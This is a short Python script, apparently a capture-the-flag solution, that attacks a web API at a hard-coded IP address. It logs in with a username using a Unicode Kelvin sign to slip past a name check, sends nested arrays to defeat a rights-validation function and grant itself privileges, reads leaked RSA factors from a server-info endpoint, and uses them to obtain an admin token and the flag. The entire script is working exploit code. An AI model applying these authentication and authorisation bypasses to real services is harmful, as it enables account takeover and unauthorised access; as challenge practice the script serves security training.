import requests

url = "http://167.172.165.153:60001"

def login(username='foo'):
  r = requests.post(url + '/login', json={"username": username})
  token = r.json()['data']['token']
  return token

def api_post(token, endpoint, data={}, headers={}):
  r = requests.post(url=url+endpoint,headers={'Content-Type': 'application/json', 'Authorization': f'Bearer {token}'}, json=data)
  return r

def api_get(token, endpoint, headers={}):
  r = requests.get(url=url+endpoint, headers={'Content-Type': 'application/json', 'Authorization': f'Bearer {token}'})
  return r

def main():
  # Login
  token = login("hac\u212Atm")  # Use the Kelvin sign!
  print(f"token: {token}")

  # Update our rights to include p and n. Use arrays to defeat checkRights
  res = api_post(token, '/updateUser',
                 data={ 'color': '0xDEDBEE',
                        'rights': [
                           ['p'],
                           ['n']
                        ]
                       })

  # Get p and n values
  res = api_get(token, "/serverInfo")
  dat = res.json()
  info = dat['data']['info']
  for i in info:
    if len(i['name']) == 1 and i['name'][0] == 'p':
      p = int(i['value'])
    if len(i['name']) == 1 and i['name'][0] == 'n':
      n = int(i['value'])

  print(f"p: {p}")
  print(f"n: {n}")

  # Derive q. Use // to maintain integer format
  q = n//p
  print(f"q: {q}")

  # Get the admin token
  res = api_post(token, '/init', data={"p" : str(p), "q": str(q)})
  data = res.json()['data']
  admin_token = data['token']
  print(f"admin token: {admin_token}")

  # Use the admin token to get the flag!
  print("=============================")
  res = api_get(admin_token, "/flag")
  data = res.json()['data']
  flag = data['flag']
  print(f"flag: {flag}")

if __name__ == '__main__':
  main()